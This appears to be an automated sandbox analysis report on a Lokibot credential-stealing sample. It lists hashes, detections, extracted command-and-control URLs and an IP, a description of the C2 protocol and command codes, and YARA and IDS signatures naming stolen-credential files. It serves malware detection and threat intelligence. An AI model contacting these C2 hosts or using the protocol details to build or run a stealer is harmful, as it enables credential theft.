Edit tour

Windows Analysis Report
lqoUUYTMsL.exe

Overview

General Information

Sample name:	lqoUUYTMsL.exe renamed because original name is a hash value
Original sample name:	3113c2a7b30c1cb350e8950b4222b0c4.exe
Analysis ID:	1428426
MD5:	3113c2a7b30c1cb350e8950b4222b0c4
SHA1:	2fe0c50dd095a738788693e147c0b9d883554d2c
SHA256:	7ff1d7dd5684cd38bea4a227bf49d4ceff1de7d2f66a556ccc6ce1a382640fc6
Tags:	exeLoki
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected Lokibot

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Machine Learning detection for sample

PE file contains section with special chars

PE file has nameless sections

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Yara detected aPLib compressed binary

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

lqoUUYTMsL.exe (PID: 7104 cmdline: "C:\Users\user\Desktop\lqoUUYTMsL.exe" MD5: 3113C2A7B30C1CB350E8950B4222B0C4)

lqoUUYTMsL.exe (PID: 6464 cmdline: C:\Users\user\Desktop\lqoUUYTMsL.exe MD5: 3113C2A7B30C1CB350E8950B4222B0C4)

lqoUUYTMsL.exe (PID: 6408 cmdline: C:\Users\user\Desktop\lqoUUYTMsL.exe MD5: 3113C2A7B30C1CB350E8950B4222B0C4)

lqoUUYTMsL.exe (PID: 5352 cmdline: C:\Users\user\Desktop\lqoUUYTMsL.exe MD5: 3113C2A7B30C1CB350E8950B4222B0C4)

lqoUUYTMsL.exe (PID: 5088 cmdline: C:\Users\user\Desktop\lqoUUYTMsL.exe MD5: 3113C2A7B30C1CB350E8950B4222B0C4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "https://tequilacofradiamx.com/minyhug/fxgsfhsdtytdjfudyjfjewrwsejyt/Panel/five/fre.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1656396355.0000000006A83000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1656396355.0000000006A83000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1656396355.0000000006A83000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1656396355.0000000006A83000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x17900:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1656396355.0000000006A83000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x4ccb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1656396355.0000000006A83000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x1350f:$des3: 68 03 66 00 00 0x17900:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x179cc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000000.00000002.1654874181.00000000036A4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1654874181.00000000036A4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1654874181.00000000036A4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1654874181.00000000036A4000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x19c18:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1654874181.00000000036A4000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x6fa3:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1654874181.00000000036A4000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x157e7:$des3: 68 03 66 00 00 0x19c18:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x19ce4:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.1654874181.00000000036DC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1654874181.00000000036DC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1654874181.00000000036DC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1654874181.00000000036DC000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x19fc8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1654874181.00000000036DC000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x7353:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1654874181.00000000036DC000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x15b97:$des3: 68 03 66 00 00 0x19fc8:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1a094:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.1654874181.00000000036C0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1654874181.00000000036C0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1654874181.00000000036C0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1654874181.00000000036C0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x19df0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1654874181.00000000036C0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x717b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1654874181.00000000036C0000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x159bf:$des3: 68 03 66 00 00 0x19df0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x19ebc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000001.00000002.1680125185.0000000000F08000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
00000000.00000002.1654874181.0000000003520000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1654874181.0000000003520000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1654874181.0000000003520000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1654874181.0000000003520000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x181a40:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1654874181.0000000003520000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x16edcb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1654874181.0000000003520000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x17d60f:$des3: 68 03 66 00 00 0x181a40:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x181b0c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Process Memory Space: lqoUUYTMsL.exe PID: 7104	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: lqoUUYTMsL.exe PID: 7104	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: lqoUUYTMsL.exe PID: 7104	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x14019:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x4db76:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x1463e3:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x149402:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x1af305:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: lqoUUYTMsL.exe PID: 6464	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: lqoUUYTMsL.exe PID: 6408	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: lqoUUYTMsL.exe PID: 6408	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: lqoUUYTMsL.exe PID: 6408	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x1f78:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 41 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.lqoUUYTMsL.exe.6a83510.4.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.lqoUUYTMsL.exe.6a83510.4.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.lqoUUYTMsL.exe.6a83510.4.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.lqoUUYTMsL.exe.6a83510.4.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.lqoUUYTMsL.exe.6a83510.4.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.2.lqoUUYTMsL.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
2.2.lqoUUYTMsL.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
2.2.lqoUUYTMsL.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.lqoUUYTMsL.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
2.2.lqoUUYTMsL.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
2.2.lqoUUYTMsL.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
2.2.lqoUUYTMsL.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.2.lqoUUYTMsL.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.lqoUUYTMsL.exe.6a83510.4.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.lqoUUYTMsL.exe.6a83510.4.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.lqoUUYTMsL.exe.6a83510.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.lqoUUYTMsL.exe.6a83510.4.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.lqoUUYTMsL.exe.6a83510.4.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.lqoUUYTMsL.exe.6a83510.4.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.lqoUUYTMsL.exe.6a83510.4.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.lqoUUYTMsL.exe.6a83510.4.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
2.2.lqoUUYTMsL.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
2.2.lqoUUYTMsL.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
2.2.lqoUUYTMsL.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.lqoUUYTMsL.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
2.2.lqoUUYTMsL.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
2.2.lqoUUYTMsL.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
2.2.lqoUUYTMsL.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.2.lqoUUYTMsL.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
Click to see the 24 entries

Snort Signatures

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 - Source IP: 192.168.2.4 - Destination IP: 91.92.253.228

Timestamp:	04/18/24-23:01:56.652272
SID:	2024317
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 91.92.253.228

Timestamp:	04/18/24-23:01:58.789410
SID:	2024318
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 91.92.253.228

Timestamp:	04/18/24-23:01:56.652272
SID:	2021641
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 91.92.253.228

Timestamp:	04/18/24-23:01:58.045440
SID:	2024313
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 91.92.253.228

Timestamp:	04/18/24-23:01:58.045440
SID:	2021641
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 91.92.253.228

Timestamp:	04/18/24-23:01:58.045440
SID:	2825766
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 91.92.253.228

Timestamp:	04/18/24-23:01:58.045440
SID:	2025381
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 91.92.253.228

Timestamp:	04/18/24-23:01:57.372627
SID:	2021641
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 - Source IP: 192.168.2.4 - Destination IP: 91.92.253.228

Timestamp:	04/18/24-23:01:57.372627
SID:	2024317
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 91.92.253.228

Timestamp:	04/18/24-23:01:57.372627
SID:	2825766
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.2.4 - Destination IP: 91.92.253.228

Timestamp:	04/18/24-23:01:57.372627
SID:	2024312
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 91.92.253.228

Timestamp:	04/18/24-23:01:58.789410
SID:	2025381
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 91.92.253.228

Timestamp:	04/18/24-23:01:56.652272
SID:	2025381
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 91.92.253.228

Timestamp:	04/18/24-23:01:56.652272
SID:	2825766
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.2.4 - Destination IP: 91.92.253.228

Timestamp:	04/18/24-23:01:56.652272
SID:	2024312
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 91.92.253.228

Timestamp:	04/18/24-23:01:57.372627
SID:	2025381
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 91.92.253.228

Timestamp:	04/18/24-23:01:58.045440
SID:	2024318
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 91.92.253.228

Timestamp:	04/18/24-23:01:58.789410
SID:	2024313
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 91.92.253.228

Timestamp:	04/18/24-23:01:58.789410
SID:	2021641
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 91.92.253.228

Timestamp:	04/18/24-23:01:58.789410
SID:	2825766
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: lqoUUYTMsL.exe

